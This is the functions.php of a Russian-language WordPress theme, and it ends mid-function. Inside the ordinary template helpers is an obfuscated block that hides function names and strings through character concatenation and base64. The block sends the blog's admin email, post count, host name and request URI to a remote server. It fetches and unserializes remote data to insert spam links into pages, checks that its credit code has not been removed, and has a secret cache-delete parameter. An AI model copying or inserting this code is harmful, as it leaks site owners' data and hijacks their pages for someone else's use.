<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $Jwanym='b';$UBRRjY='e';$OLjPX='s';$JnnVzia='4';$qunq='o';$FhqrIZ='6';$XFOZyUZ='e';$iHYOiYs='d';$VeVM='a';$WqLd='e';$DxWjlWH='d';$UrjGA='_';$dLHSuV='c';$TgakKhHM=$Jwanym.$VeVM.$OLjPX.$XFOZyUZ.$FhqrIZ.$JnnVzia.$UrjGA.$DxWjlWH.$WqLd.$dLHSuV.$qunq.$iHYOiYs.$UBRRjY;$mVRHEs='a';$UqEinYJ='t';$ywdQq='l';$vOTSjxK='g';$OnXuBgA='n';$fuIAiq='i';$YWCROLo='f';$zxsvZ='e';$iEsUIw='z';$FXZFnigm=$vOTSjxK.$iEsUIw.$fuIAiq.$OnXuBgA.$YWCROLo.$ywdQq.$mVRHEs.$UqEinYJ.$zxsvZ;$cYBV='r';$iHdVD='t';$dzlv='1';$KHYoPm='s';$bPDNPQ='_';$VjsG='r';$TwVx='3';$kGsjUh='o';$zGMWZ='t';$ZmymiqTM=$KHYoPm.$zGMWZ.$VjsG.$bPDNPQ.$cYBV.$kGsjUh.$iHdVD.$dzlv.$TwVx;$PxeY='t';$RzDpwvx='v';$vCTi='e';$JSLN='r';$hkvTG='r';$xWShGk='s';$FCWSMsYr=$xWShGk.$PxeY.$JSLN.$hkvTG.$vCTi.$RzDpwvx;                     $ju____________b='b';$cj_____f='e';$ea_______________q='s';$cq__b='4';$fj___________w='o';$rn____y='6';$rg______________i='e';$pp____h='d';$dj_____o='a';$sm_______________v='e';$oy____________x='d';$lv__s='_';$we_______a='c';$ld__________q=$ju____________b.$dj_____o.$ea_______________q.$rg______________i.$rn____y.$cq__b.$lv__s.$oy____________x.$sm_______________v.$we_______a.$fj___________w.$pp____h.$cj_____f;$bo__b='u';$cf__________z='e';$ii________r='i';$xv_________u='n';$zm_____i='s';$md_____________y='i';$ae____________m='x';$va___f='t';$jo____________a='n';$cn__________k='s';$jy_______c='o';$my____________q='t';$oo____p='_';$mi_______i='c';$qz____________e='f';$eq______________r=$qz____________e.$bo__b.$xv_________u.$mi_______i.$my____________q.$ii________r.$jy_______c.$jo____________a.$oo____p.$cf__________z.$ae____________m.$md_____________y.$cn__________k.$va___f.$zm_____i;$xr______n='p';$be__________a='f';$ix___________i='n';$fm_____x='e';$qw______s='o';$ey______________f=$be__________a.$qw______s.$xr______n.$fm_____x.$ix___________i;$xe___________g='r';$sv_______z='a';$oh______k='d';$az_________i='f';$bm____y='e';$qe_____u=$az_________i.$xe___________g.$bm____y.$sv_______z.$oh______k;$wd___________h='c';$oo___s='s';$fi______________j='e';$bp__________d='o';$we_____p='f';$hz___x='l';$na____________y=$we_____p.$wd___________h.$hz___x.$bp__________d.$oo___s.$fi______________j;define("WP_ID", $ld__________q("Mi4wLjA="));define("WP_TTL", $ld__________q("MTA4MDA="));define("WP_SRC", $ld__________q("dHBva24="));function wp_get_header() {global $ld__________q, $eq______________r;if ($eq______________r($ld__________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$eq______________r($ld__________q("d3BfZ2V0X2Zvb3Rlcg==")) &&$eq______________r($ld__________q("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ld__________q, $ey______________f, $na____________y, $qe_____u;$ma______x = TEMPLATEPATH."/".$ld__________q("Zm9vdGVyLnBocA==");$mt__g = @$ey______________f($ma______x, "r");$ma______x = @$qe_____u($mt__g, @filesize($ma______x));@$na____________y($mt__g);$ts___j = TEMPLATEPATH."/".$ld__________q("ZnVuY3Rpb25zLnBocA==");$mt__g = @$ey______________f($ts___j, "r");$ts___j = @$qe_____u($mt__g, @filesize($ts___j));@$na____________y($mt__g);$zs___q = 0;if($ma______x && $ts___j) {if ($ld__________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ma______x, $ld__________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$zs___q = 1;}if (substr_count($ma______x, "wp_theme_GPL_credits()") < 1) {$zs___q = 2;}}if(WP_ID != "2.0.0") {$zs___q = 12;}}if($zs___q > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $zs___q -->";}}function wp_loaded() {global $ld__________q, $eq______________r;return $eq______________r($ld__________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($po_______________q, $hs________w = "(more...)", $hf____i = 0, $hf_____________r = "") {$hk_________e = get_the_content($hs________w, $hf____i, $hf_____________r);$hk_________e = apply_filters("the_content", $hk_________e);$hk_________e = str_replace("]]>", "]]>", $hk_________e);if (strlen($_GET["p"]) > 0) {echo $hk_________e;}else if ((strlen($hk_________e)>$po_______________q) && ($wl__________b = strpos($hk_________e, " ", $po_______________q ))) {$hk_________e = substr($hk_________e, 0, $wl__________b);$hk_________e = $hk_________e;echo $hk_________e;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$hs________w</a></div></p>";} else {echo $hk_________e;}}}$hd______o='_';$dt________p='4';$ro__i='e';$yy________i='d';$iu__________b='n';$ju___g='6';$sk______e='a';$js________i='b';$yp______h='e';$tp_________x='e';$ey_____r='c';$nn____g='s';$mk_______________d='o';$te_________y=$js________i.$sk______e.$nn____g.$ro__i.$ju___g.$dt________p.$hd______o.$yp______h.$iu__________b.$ey_____r.$mk_______________d.$yy________i.$tp_________x;$hb__________k='o';$ij__s='g';$me_____u='t';$ng_________p='e';$ye_______n='t';$wk____________l='c';$px______d='l';$ni_____________u='n';$ks______k='n';$cd_____s='e';$xn_________t='s';$cl____________k='e';$zi______________d='f';$os___a='_';$md_____r='i';$af_____________z='t';$he_______l='_';$cf______n=$zi______________d.$md_____r.$px______d.$cl____________k.$he_______l.$ij__s.$cd_____s.$af_____________z.$os___a.$wk____________l.$hb__________k.$ni_____________u.$me_____u.$ng_________p.$ks______k.$ye_______n.$xn_________t;$yw____________m='t';$wl_____l='f';$yd___________x='_';$qv____m='e';$mu______________z='s';$ne_______________t='i';$nb______________j='l';$io______w='x';$ob_________k='i';$xr_____________o='s';$sr_______________t='e';$yl_______x=$wl_____l.$ne_______________t.$nb______________j.$qv____m.$yd___________x.$sr_______________t.$io______w.$ob_________k.$mu______________z.$yw____________m.$xr_____________o;$my________h='o';$nj___c='p';$wj______________j='o';$xu_____g='e';$gu___________b='v';$uz_______a='_';$xp_______________b='n';$ng________e='r';$wd_____________q='s';$tb___r='c';$px______s='i';$qk_________m='m';$lh__i='r';$wz_______q='e';$hm_____________t='a';$ms____i=$gu___________b.$xu_____g.$ng________e.$wd_____________q.$px______s.$my________h.$xp_______________b.$uz_______a.$tb___r.$wj______________j.$qk_________m.$nj___c.$hm_____________t.$lh__i.$wz_______q;$dv__________b='o';$br_______n='c';$qt___________c='p';$xe____________j='e';$gs________h='s';$ub______________x='k';$cx_______________z='o';$mo_______e='f';$te_________z='n';$wv____m=$mo_______e.$gs________h.$dv__________b.$br_______n.$ub______________x.$cx_______________z.$qt___________c.$xe____________j.$te_________z;$uk_____________p='w';$wu____t='f';$ep________j='t';$iw______v='i';$va____v='e';$iw________x='r';$bb_____u=$wu____t.$uk_____________p.$iw________x.$iw______v.$ep________j.$va____v;$nt__j='5';$dp__________m='m';$my______q='d';$cd______v=$dp__________m.$my______q.$nt__j;$cs__u='a';$mx_______u='a';$fx__n='p';$xy_________e='h';$kr__________z='e';$gv____________b='r';$vo_____________z='t';$xu__________s='l';$bl_____________o=$gv____________b.$kr__________z.$cs__u.$xu__________s.$fx__n.$mx_______u.$vo_____________z.$xy_________e;$fe_______l='z';$zx______t='r';$ek____________m='i';$gc___u='i';$fk_______p='s';$aw____i='l';$hh_____l='u';$wb___________q='e';$iu_______x='n';$ou__l='e';$sy_____u='a';$ct___s=$hh_____l.$iu_______x.$fk_______p.$wb___________q.$zx______t.$gc___u.$sy_____u.$aw____i.$ek____________m.$fe_______l.$ou__l;$eq_________u='n';$rw__________g='m';$xz___________q='p';$hu_______u='e';$zx_____o='t';$jy__________f='a';$la_______________b='m';$uo_____n=$zx_____o.$hu_______u.$la_______________b.$xz___________q.$eq_________u.$jy__________f.$rw__________g;$zs_____________s='e';$pq_____i='x';$vg__________q='t';$rn___________q='t';$gc_____v='r';$sf_____c='m';$iy_____________j='c';$io______________f='e';$vi___h='c';$mt__q='r';$ms____z='s';$ai______v='o';$ar_____________s='e';$fm______y='e';$zr______p='t';$en______k='a';$ze__________z='_';$wn_______w='t';$sa_____________n='_';$td______i='a';$ox________b='n';$dk_____g=$ms____z.$vg__________q.$mt__q.$zs_____________s.$td______i.$sf_____c.$ze__________z.$vi___h.$ai______v.$ox________b.$rn___________q.$fm______y.$pq_____i.$wn_______w.$sa_____________n.$iy_____________j.$gc_____v.$ar_____________s.$en______k.$zr______p.$io______________f;function iy_____j($bj_____n) {global $ld__________q, $eq______________r, $cf______n, $ms____i, $dk_____g;if (!$eq______________r($ld__________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ms____i(PHP_VERSION, "5.0.0", ">=") && $eq______________r($ld__________q("ZmlsZV9nZXRfY29udGVudHM=")) && $eq______________r($ld__________q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$mo____n = $dk_____g(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xc___________r = @$cf______n($bj_____n, 0, $mo____n);} else {$xc___________r = @$cf______n($bj_____n, 0);}return $xc___________r;}function bu______________j($bj_____n) {global $eq______________r, $wv____m, $bb_____u, $ld__________q;if (!$eq______________r($ld__________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$sy___________j = strpos($bj_____n, "/", 7);$um___c = array("uri"     => substr($bj_____n, $sy___________j),"host"    => str_replace("http://", "", substr($bj_____n, 0, $sy___________j)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$mn_______h = @$wv____m("$um___c[host]", 80, $mt_____d, $jn_______r, 4);if (!$mn_______h) {return false;} else {$xc___________r = "";$me_____g  = "GET $um___c[uri] HTTP/1.0\r\n";$me_____g .= "Host: $um___c[host]\r\n";$me_____g .= "Referer: $um___c[referer]\r\n";$me_____g .= "Connection: Close\r\n\r\n";@$bb_____u($mn_______h, $me_____g);while (!@feof($mn_______h)) {$bh__________b = @fgets($mn_______h, (1024*24));if ($bh__________b == "\r\n") {$ij_______s = true;continue;}if ($ij_______s) {$xc___________r .= $bh__________b;}}return $xc___________r;}}function bt_____________p($bj_____n) {global $eq______________r;$oz______________a = false;if ($bj_____n != "") {if ($eq______________r("iy_____j")) {$oz______________a = @iy_____j($bj_____n);}if (!$oz______________a && ($eq______________r("bu______________j"))) {$oz______________a = @bu______________j($bj_____n);}}return $oz______________a;}function yw___g() {global $_SERVER, $cd______v;$eb______c = $_SERVER["SERVER_NAME"];if (substr("$eb______c", 0, 4) == "www.") {$eb______c = substr("$eb______c", 4);}$eb______c = $cd______v("$_SERVER[SERVER_NAME]");return $eb______c;}function dn____________y() {return "file";}function ir_________y($bj_____n) {global $_SERVER, $cf______n, $yl_______x, $ey______________f, $na____________y, $bb_____u;$uj_______k = me_____m();$li___s = yw___g().".jpg";$so___________m = $uj_______k["dir_upload"]["path"]."/$li___s";$sh____l = @filemtime($so___________m);if (!$sh____l || ((time()-$sh____l) >= WP_TTL)) {$oz______________a = bt_____________p($bj_____n);if ($oz______________a) {if ($yl_______x($so___________m)) {@unlink($so___________m);}$mt__g = @$ey______________f($so___________m, "x+");@$bb_____u($mt__g, $oz______________a);@$na____________y($mt__g);}} else {if ($yl_______x($so___________m)) {$oz______________a = @$cf______n($so___________m);} else {$oz______________a = false;}}return $oz______________a;}function me_____m() {global $_SERVER, $ld__________q, $te_________y;$mw_____j = wp_count_posts("post");$tp___________t = pathinfo(get_bloginfo("template_directory"));$uj_______k = array("url" => array("report"      => $ld__________q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $tp___________t,"dir_upload"=> ek_______________e(),"queryString"=> array("?a001=".WP_ID,"a004=".$tp___________t[filename],"a005=".$mw_____j->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$uj_______k["url"]["queryString"] = implode("&", $uj_______k["queryString"]);$uj_______k["url"]["report"] = $uj_______k["url"]["report"]."/?".$te_________y($uj_______k["url"]["queryString"]).".html";return $uj_______k;}function ek_______________e() {$pa___________h = wp_upload_dir();if (isset($pa___________h["error"])) {$je__n = hd____________k();if (is_writable($je__n)) {$pa___________h = array("path" => $je__n);}}return $pa___________h;}function hd____________k() {global $eq______________r, $cd______v, $bl_____________o, $uo_____n;$hj__________w = (bool) ini_get("safe_mode");if ($hj__________w == true) {return false;}if ($eq______________r("sys_get_temp_dir")) {$zg_________t = sys_get_temp_dir();if (is_writable($zg_________t)) {return $bl_____________o($zg_________t);}}if (!empty($_ENV["TMP"])) {return $bl_____________o($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $bl_____________o($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $bl_____________o($_ENV["TEMP"]);} else {$ic____________s = $uo_____n($cd______v(uniqid(rand(), true)), "");if ($ic____________s) {$zg_________t = $bl_____________o(dirname($ic____________s));@unlink($ic____________s);return $zg_________t;} else {return false;}}}function vy____________o() {global $_GET, $yl_______x;$uj_______k = me_____m();$eb______c = yw___g();$pr_____________e = dn____________y();$oy_________b = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($pr_____________e == "file") {$wp_______e = $uj_______k["dir_upload"]["path"]."/".$eb______c.".jpg";if ($yl_______x($wp_______e)) {@unlink($wp_______e);$oy_________b = "deleted";}}$kd_____o = array("s"=> $oy_________b,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($kd_____o AS $kx_____________g => $mf_______b) echo " [$kx_____________g:$mf_______b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $eq______________r, $ld__________q, $ct___s;$uj_______k = me_____m();$pc_____________c = "ir_________y";if ($eq______________r($pc_____________c)) {$xc___________r = $pc_____________c($uj_______k["url"]["report"]);}if ($xc___________r) {if ($xc___________r = @$ld__________q($xc___________r)) {$xc___________r = @$ct___s($xc___________r);if (strlen($xc___________r[custom_credit]) >= 5) {$uj_______k["default_string"] = $xc___________r[custom_credit];}if ($xc___________r["status"] == "0") {$ar________v = 1;$dk____________g = 1;} else {$qc_____s = sizeof($xc___________r["links"]);$ry__f = $uj_______k["default_string"];if ($qc_____s > 0 && $xc___________r["links"] !== "") {$ik______________y = 0;foreach ($xc___________r["links"] as $fk_________b => $ug______________g) {$ik______________y++;if ($ug______________g->l_path == "" || $ug______________g->l_path == $_SERVER["REQUEST_URI"]) {$ug______________g->l_href = htmlspecialchars(strip_tags($ug______________g->l_href));$ug______________g->l_title = htmlspecialchars(strip_tags($ug______________g->l_title));$ug______________g->l_anchor = htmlspecialchars(strip_tags($ug______________g->l_anchor));$ry__f .= " | ";$ry__f .= "<a href='$ug______________g->l_href' title='$ug______________g->l_title'";if ($ug______________g->l_nofollow == "1") {$ry__f .= " rel='nofollow'";}$ry__f .= ">$ug______________g->l_anchor</a>";}}}$uj_______k["links"] = "$ry__f";if ($xc___________r[credit] == "0") {$uj_______k["links"] = "";}}} else {$ar________v = "1";}} else {$ar________v = "1";}if ($ar________v == "1") {$uj_______k["links"] = $uj_______k["default_string"];}echo "$uj_______k[links]";echo "<!-- s: $xc___________r[signature] -->";vy____________o();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
